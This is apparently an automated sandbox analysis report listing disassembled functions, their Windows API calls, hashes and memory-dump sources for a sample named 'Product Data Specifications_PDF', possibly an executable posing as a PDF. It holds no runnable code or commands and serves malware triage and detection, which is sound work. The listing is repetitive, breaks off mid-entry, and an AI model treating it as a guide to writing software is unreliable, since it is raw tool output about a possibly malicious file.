                              • Instruction ID: 6818256dd78c2cb29ac0ce267de24fb792dca3a41353b59757f5ace631f71379
                              • Opcode Fuzzy Hash: 49223ed515fb619a5bee3fab41eec0f0b951464039ac7af7222e30fa4423140a
                              • Instruction Fuzzy Hash: DC318DB1A00201EBDB10EFB5C945A1ABBE8AF45319F10885EFC44AB343CB79ED45CB94
                              Function 0042083F Relevance: 6.1, APIs: 4, Instructions: 103COMMONLIBRARYCODE
                              Download Yara Rule
                              APIs
                              • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 00420873
                              • __isleadbyte_l.LIBCMT ref: 004208A6
                              • MultiByteToWideChar.KERNEL32(BBDAE900,00000009,?,000001AC,00000000,00000000,?,?,?,0042D7C1,?,00000000), ref: 004208D7
                              • MultiByteToWideChar.KERNEL32(BBDAE900,00000009,?,00000001,00000000,00000000,?,?,?,0042D7C1,?,00000000), ref: 00420945
                              Memory Dump Source
                              • Source File: 00000006.00000002.1381461965.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000006.00000002.1381447340.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381500994.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381518159.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381574357.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381684928.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_400000_Product Data Specifications_PDF.jbxd
                              Similarity
                              • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                              • String ID:
                              • API String ID: 3058430110-0
                              • Opcode ID: 6122c04dd5dc57efc0e5b6c0779ec963bae9ccf891294cd495d8fd5d7cdcec1f
                              • Instruction ID: f6550d230e50e909e13d2a99824cc28569674f7a7b9e5ef0daa2e7ce22e82e6e
                              • Opcode Fuzzy Hash: 6122c04dd5dc57efc0e5b6c0779ec963bae9ccf891294cd495d8fd5d7cdcec1f
                              • Instruction Fuzzy Hash: D731E231B00265EFDB20EF65E884AAF3BE5BF00310F55496AE4658B292D734CD80DB98
                              Function 0045039B Relevance: 6.1, APIs: 4, Instructions: 102COMMON
                              Download Yara Rule
                              APIs
                              • GetParent.USER32(?), ref: 004503C8
                              • DefDlgProcW.USER32(?,00000138,?,?), ref: 00450417
                              • DefDlgProcW.USER32(?,00000133,?,?), ref: 00450466
                              • DefDlgProcW.USER32(?,00000134,?,?), ref: 00450497
                              Memory Dump Source
                              • Source File: 00000006.00000002.1381461965.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000006.00000002.1381447340.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381500994.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381518159.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381574357.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381684928.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_400000_Product Data Specifications_PDF.jbxd
                              Similarity
                              • API ID: Proc$Parent
                              • String ID:
                              • API String ID: 2351499541-0
                              • Opcode ID: 953005dfd523491bc8661b2d189c1fe3a1d27544861a9947cd3b684206b02ae0
                              • Instruction ID: 48835c6935d03606f494e5d0f95072c3389227be5880c4b08380f2331de9f088
                              • Opcode Fuzzy Hash: 953005dfd523491bc8661b2d189c1fe3a1d27544861a9947cd3b684206b02ae0
                              • Instruction Fuzzy Hash: F231B73A2001046BD720CF18DC94DAB7719EF97335B14461BFA298B3D3CB759856C769
                              Function 00442A83 Relevance: 6.1, APIs: 4, Instructions: 87windowCOMMON
                              Download Yara Rule
                              APIs
                              • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00442AC9
                              • TranslateMessage.USER32(?), ref: 00442B01
                              • DispatchMessageW.USER32(?), ref: 00442B0B
                              • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00442B21
                              Memory Dump Source
                              • Source File: 00000006.00000002.1381461965.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000006.00000002.1381447340.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381500994.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381518159.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381574357.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381684928.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_400000_Product Data Specifications_PDF.jbxd
                              Similarity
                              • API ID: Message$Peek$DispatchTranslate
                              • String ID:
                              • API String ID: 1795658109-0
                              • Opcode ID: 36eab9d42bd73f6f728abf92f57c3db94032fb3fd80da71d70c6aa8f6f72699a
                              • Instruction ID: 5e5183f3b0572ad37d893cec5a7cf9421d6c1ddc4b80b1975d6d8daaa3c1acd1
                              • Opcode Fuzzy Hash: 36eab9d42bd73f6f728abf92f57c3db94032fb3fd80da71d70c6aa8f6f72699a
                              • Instruction Fuzzy Hash: 012126719583469AFB30DF649D85FB7BBA8CB24314F40407BF91097281EAB86848C769
                              Function 0047438B Relevance: 6.1, APIs: 4, Instructions: 83COMMON
                              Download Yara Rule
                              APIs
                              • GetForegroundWindow.USER32(?,?,?), ref: 0047439C
                                • Part of subcall function 004439C1: GetWindowThreadProcessId.USER32(?,00000000), ref: 004439E4
                                • Part of subcall function 004439C1: GetCurrentThreadId.KERNEL32 ref: 004439EB
                                • Part of subcall function 004439C1: AttachThreadInput.USER32(00000000), ref: 004439F2
                              • GetCaretPos.USER32(?), ref: 004743B2
                              • ClientToScreen.USER32(00000000,?), ref: 004743E8
                              • GetForegroundWindow.USER32 ref: 004743EE
                              Memory Dump Source
                              • Source File: 00000006.00000002.1381461965.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000006.00000002.1381447340.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381500994.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381518159.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381574357.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381684928.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_400000_Product Data Specifications_PDF.jbxd
                              Similarity
                              • API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
                              • String ID:
                              • API String ID: 2759813231-0
                              • Opcode ID: f13b499454a1a1822ca13fc8ae6b328d463f7326d10c65fcbffa9176c03fd335
                              • Instruction ID: 29594bdffde582d62cf8cb535202cb0f6e37f5c0e74140e0e8dac686a3932322
                              • Opcode Fuzzy Hash: f13b499454a1a1822ca13fc8ae6b328d463f7326d10c65fcbffa9176c03fd335
                              • Instruction Fuzzy Hash: 2F21AC71A00305ABD710EF75CC86B9E77B9AF44708F14446EF644BB2C2DBF9A9408BA5
                              Function 004494A5 Relevance: 6.1, APIs: 4, Instructions: 83windowCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 00430626: _wcspbrk.LIBCMT ref: 00430636
                              • SendMessageW.USER32(?,00001002,00000000,?), ref: 00449477
                              • SendMessageW.USER32(?,00001060,00000000,00000004), ref: 00449507
                              • _wcslen.LIBCMT ref: 00449519
                              • _wcslen.LIBCMT ref: 00449526
                              Memory Dump Source
                              • Source File: 00000006.00000002.1381461965.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000006.00000002.1381447340.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381500994.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381518159.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381574357.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381684928.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_400000_Product Data Specifications_PDF.jbxd
                              Similarity
                              • API ID: MessageSend_wcslen$_wcspbrk
                              • String ID:
                              • API String ID: 2886238975-0
                              • Opcode ID: cda1f7e16000b3d6f1552df2769fac91363fb93f1f54a3f578086acf89ecf69d
                              • Instruction ID: 7d4d19c59aaf55394df3596c947b25f6969e765268ec3300c5285dc4bbf20b28
                              • Opcode Fuzzy Hash: cda1f7e16000b3d6f1552df2769fac91363fb93f1f54a3f578086acf89ecf69d
                              • Instruction Fuzzy Hash: F7213A76B00208A6E730DF55ED81BEFB368EBA0310F10416FFF0896240E6794D55C799
                              Function 0046888B Relevance: 6.1, APIs: 4, Instructions: 80COMMON
                              Download Yara Rule
                              APIs
                              Memory Dump Source
                              • Source File: 00000006.00000002.1381461965.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000006.00000002.1381447340.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381500994.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381518159.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381574357.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381684928.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_400000_Product Data Specifications_PDF.jbxd
                              Similarity
                              • API ID: __setmode$DebugOutputString_fprintf
                              • String ID:
                              • API String ID: 1792727568-0
                              • Opcode ID: 1ad8d8d19ebad69fc12c553a92627abd23c9aa4f6f7f42f57f8396caf8494ece
                              • Instruction ID: 94d91137fd77379d51e6296772f15362c7f2cf1f8b16651245aa9cc134f84072
                              • Opcode Fuzzy Hash: 1ad8d8d19ebad69fc12c553a92627abd23c9aa4f6f7f42f57f8396caf8494ece
                              • Instruction Fuzzy Hash: 5411A1B2D0020477DB107BB69C469AF7B2C8B55728F04416EF91573243E97C6A4947AB
                              Function 0047A26A Relevance: 6.1, APIs: 4, Instructions: 78COMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 0046F3C1: IsWindow.USER32(00000000), ref: 0046F3F1
                              • GetWindowLongW.USER32(?,000000EC), ref: 0047A2DF
                              • SetWindowLongW.USER32(?,000000EC,00000000), ref: 0047A2FA
                              • SetWindowLongW.USER32(?,000000EC,00000000), ref: 0047A312
                              • SetLayeredWindowAttributes.USER32(?,00000000,?,00000002,?,000000EC,00000000,?,000000EC,?,00000001), ref: 0047A321
                              Memory Dump Source
                              • Source File: 00000006.00000002.1381461965.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000006.00000002.1381447340.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381500994.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381518159.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381574357.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381684928.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_400000_Product Data Specifications_PDF.jbxd
                              Similarity
                              • API ID: Window$Long$AttributesLayered
                              • String ID:
                              • API String ID: 2169480361-0
                              • Opcode ID: 53dc7990cfeb01f65bcc542d15cac6368a2c86d5c8ae23ecc65d9f578e391a7a
                              • Instruction ID: 4b457c036b32d13d4d6aa44b7b333d7b15c6210fa1ac615a770d46c951a2b689
                              • Opcode Fuzzy Hash: 53dc7990cfeb01f65bcc542d15cac6368a2c86d5c8ae23ecc65d9f578e391a7a
                              • Instruction Fuzzy Hash: E321C3322045146BD310AB19EC45F9BB798EF81334F20862BF859E72D1C779A855C7AC
                              Function 00434CC9 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 75stringCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 00434C09: lstrlenW.KERNEL32(?), ref: 00434C1C
                                • Part of subcall function 00434C09: lstrcpyW.KERNEL32(00000000,?), ref: 00434C44
                                • Part of subcall function 00434C09: lstrcmpiW.KERNEL32(00000000,00000000), ref: 00434C78
                              • lstrlenW.KERNEL32(?), ref: 00434CF6
                                • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                              • lstrcpyW.KERNEL32(00000000,?), ref: 00434D1E
                              • lstrcmpiW.KERNEL32(00000002,cdecl), ref: 00434D64
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.1381461965.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000006.00000002.1381447340.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381500994.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381518159.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381574357.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381684928.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_400000_Product Data Specifications_PDF.jbxd
                              Similarity
                              • API ID: lstrcmpilstrcpylstrlen$_malloc
                              • String ID: cdecl
                              • API String ID: 3850814276-3896280584
                              • Opcode ID: 6cbd38251dd4a86e43de7c927aee515647cd65b84628e0119afa42224a7639cc
                              • Instruction ID: b4b7f9d7485e9dcc41445171e378d0673d7e4b3d8a31a27b28546bfa00bfc119
                              • Opcode Fuzzy Hash: 6cbd38251dd4a86e43de7c927aee515647cd65b84628e0119afa42224a7639cc
                              • Instruction Fuzzy Hash: 1521D276200301ABD710AF25DC45AEBB3A9FF99354F10583FF90687250EB39E945C7A9
                              Function 0046D402 Relevance: 6.1, APIs: 4, Instructions: 73networkCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 0045F645: WideCharToMultiByte.KERNEL32(00000000,00000000,5004C483,D29EE858,00000000,00000000,00000000,00000000,?,?,?,00467B75,?,00473BB8,00473BB8,?), ref: 0045F661
                              • gethostbyname.WSOCK32(?,00000000,?,?), ref: 0046D42D
                              • WSAGetLastError.WSOCK32(00000000), ref: 0046D439
                              • _memmove.LIBCMT ref: 0046D475
                              • inet_ntoa.WSOCK32(?), ref: 0046D481
                              Memory Dump Source
                              • Source File: 00000006.00000002.1381461965.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000006.00000002.1381447340.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381500994.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381518159.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381574357.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381684928.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_400000_Product Data Specifications_PDF.jbxd
                              Similarity
                              • API ID: ByteCharErrorLastMultiWide_memmovegethostbynameinet_ntoa
                              • String ID:
                              • API String ID: 2502553879-0
                              • Opcode ID: c217391507a75a633327f3eae623a7fb2dd57c89b178c2547ebfa016f7fa05d4
                              • Instruction ID: 24c3f219ec43f49587972b4c28f02db1d16d05b11a5808876a7c02c26e676da9
                              • Opcode Fuzzy Hash: c217391507a75a633327f3eae623a7fb2dd57c89b178c2547ebfa016f7fa05d4
                              • Instruction Fuzzy Hash: A7216F769001046BC700FBA6DD85C9FB7BCEF48318B10486BFC01B7241DA39EE058BA5
                              Function 00448C3C Relevance: 6.1, APIs: 4, Instructions: 72windowCOMMON
                              Download Yara Rule
                              APIs
                              • SendMessageW.USER32 ref: 00448C69
                              • GetWindowLongW.USER32(?,000000EC), ref: 00448C91
                              • SendMessageW.USER32(?,0000104C,00000000,?), ref: 00448CCA
                              • SendMessageW.USER32(?,0000102B,00000000,?), ref: 00448D13
                              Memory Dump Source
                              • Source File: 00000006.00000002.1381461965.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000006.00000002.1381447340.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381500994.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381518159.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381574357.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381684928.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_400000_Product Data Specifications_PDF.jbxd
                              Similarity
                              • API ID: MessageSend$LongWindow
                              • String ID:
                              • API String ID: 312131281-0
                              • Opcode ID: aa9ba785652a5e2d68973233cc9ee5be9ec2ae113b50a66827928a68bf1dc890
                              • Instruction ID: 9d65767971b32091eca868ce8e4b461936feaca2c152e776436a997c982fc1ac
                              • Opcode Fuzzy Hash: aa9ba785652a5e2d68973233cc9ee5be9ec2ae113b50a66827928a68bf1dc890
                              • Instruction Fuzzy Hash: 782186711193009BE3209F18DD88B9FB7E4FBD5325F140B1EF994962D0DBB58448C755
                              Function 00458A61 Relevance: 6.1, APIs: 4, Instructions: 71networkCOMMON
                              Download Yara Rule
                              APIs
                              • select.WSOCK32(00000000,?,00000000,00000000,?), ref: 00458ABD
                              • __WSAFDIsSet.WSOCK32(00000000,00000001), ref: 00458ACF
                              • accept.WSOCK32(00000000,00000000,00000000), ref: 00458ADE
                              • WSAGetLastError.WSOCK32(00000000), ref: 00458B03
                              Memory Dump Source
                              • Source File: 00000006.00000002.1381461965.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000006.00000002.1381447340.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381500994.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381518159.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381574357.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381684928.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_400000_Product Data Specifications_PDF.jbxd
                              Similarity
                              • API ID: ErrorLastacceptselect
                              • String ID:
                              • API String ID: 385091864-0
                              • Opcode ID: feb2d603c895e760471213290e220df4c8c9e23c071c6cdae6f1f3a6ceb811dc
                              • Instruction ID: 6dce411450cb473f00463c700f03c36a20fe0f69cdcaeecb298670ce0bdbd9a3
                              • Opcode Fuzzy Hash: feb2d603c895e760471213290e220df4c8c9e23c071c6cdae6f1f3a6ceb811dc
                              • Instruction Fuzzy Hash: 032192716002049FD714EF69DD45BAAB7E8EB94310F10866EF988DB380DBB4A9808B94
                              Function 004368A0 Relevance: 6.1, APIs: 4, Instructions: 69windowCOMMON
                              Download Yara Rule
                              APIs
                              • SendMessageW.USER32(?,000000B0,?,?), ref: 004368C2
                              • SendMessageW.USER32(?,000000C9,?,00000000), ref: 004368D5
                              • SendMessageW.USER32(?,000000C9,?,00000000), ref: 004368EC
                              • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00436904
                              Memory Dump Source
                              • Source File: 00000006.00000002.1381461965.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000006.00000002.1381447340.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381500994.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381518159.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381574357.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381684928.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_400000_Product Data Specifications_PDF.jbxd
                              Similarity
                              • API ID: MessageSend
                              • String ID:
                              • API String ID: 3850602802-0
                              • Opcode ID: 236e71af2ab5509716104e28957e7b962cfbcf4ba6a1ba9531cfd5eb7baefe48
                              • Instruction ID: 15055718653181d31d708d6839b45d2b231db9ad4f5f2f8f789da6f3b04ac486
                              • Opcode Fuzzy Hash: 236e71af2ab5509716104e28957e7b962cfbcf4ba6a1ba9531cfd5eb7baefe48
                              • Instruction Fuzzy Hash: A7111275640208BFDB10DF68DC85F9AB7E8EF98750F11815AFD48DB340D6B1A9418FA0
                              Function 004301F8 Relevance: 6.1, APIs: 4, Instructions: 57windowCOMMON
                              Download Yara Rule
                              APIs
                              • CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00400000,00000000), ref: 00430242
                              • GetStockObject.GDI32(00000011), ref: 00430258
                              • SendMessageW.USER32(00000000,00000030,00000000), ref: 00430262
                              • ShowWindow.USER32(00000000,00000000), ref: 0043027D
                              Memory Dump Source
                              • Source File: 00000006.00000002.1381461965.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000006.00000002.1381447340.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381500994.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381518159.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381574357.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381684928.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_400000_Product Data Specifications_PDF.jbxd
                              Similarity
                              • API ID: Window$CreateMessageObjectSendShowStock
                              • String ID:
                              • API String ID: 1358664141-0
                              • Opcode ID: ad6f98361a8c00dabf9f53bae98ff29a7c8ddeda354316ac2ad0817ad8c48d31
                              • Instruction ID: 87b955557270564ac2446a75def7de819d41fbc8528d619d8765837e6f615a12
                              • Opcode Fuzzy Hash: ad6f98361a8c00dabf9f53bae98ff29a7c8ddeda354316ac2ad0817ad8c48d31
                              • Instruction Fuzzy Hash: BD115172600504ABD755CF99DC59FDBB769AF8DB10F148319BA08932A0D774EC41CBA8
                              Function 00443C87 Relevance: 6.1, APIs: 4, Instructions: 57synchronizationthreadwindowCOMMON
                              Download Yara Rule
                              APIs
                              • GetCurrentThreadId.KERNEL32 ref: 00443CA6
                              • MessageBoxW.USER32(?,?,?,?), ref: 00443CDC
                              • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 00443CF2
                              • CloseHandle.KERNEL32(00000000), ref: 00443CF9
                              Memory Dump Source
                              • Source File: 00000006.00000002.1381461965.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000006.00000002.1381447340.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381500994.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381518159.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381574357.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381684928.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_400000_Product Data Specifications_PDF.jbxd
                              Similarity
                              • API ID: CloseCurrentHandleMessageObjectSingleThreadWait
                              • String ID:
                              • API String ID: 2880819207-0
                              • Opcode ID: 229c650092e78496607f1920186e21dd31435e443465a7f1ce6d350790d3a3c2
                              • Instruction ID: e6f874550e00e623fb34483f391c95d80eb5f5bc6ce026338450b862d26ff76c
                              • Opcode Fuzzy Hash: 229c650092e78496607f1920186e21dd31435e443465a7f1ce6d350790d3a3c2
                              • Instruction Fuzzy Hash: 48112572804114ABD710CF68ED08ADF3FACDF99721F10026AFC0493381D6B09A1083E9
                              Function 00430B87 Relevance: 6.1, APIs: 4, Instructions: 53COMMON
                              Download Yara Rule
                              APIs
                              • GetWindowRect.USER32(?,?), ref: 00430BA2
                              • ScreenToClient.USER32(?,?), ref: 00430BC1
                              • ScreenToClient.USER32(?,?), ref: 00430BE2
                              • InvalidateRect.USER32(?,?,?,?,?), ref: 00430BFB
                              Memory Dump Source
                              • Source File: 00000006.00000002.1381461965.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000006.00000002.1381447340.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381500994.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381518159.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381574357.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
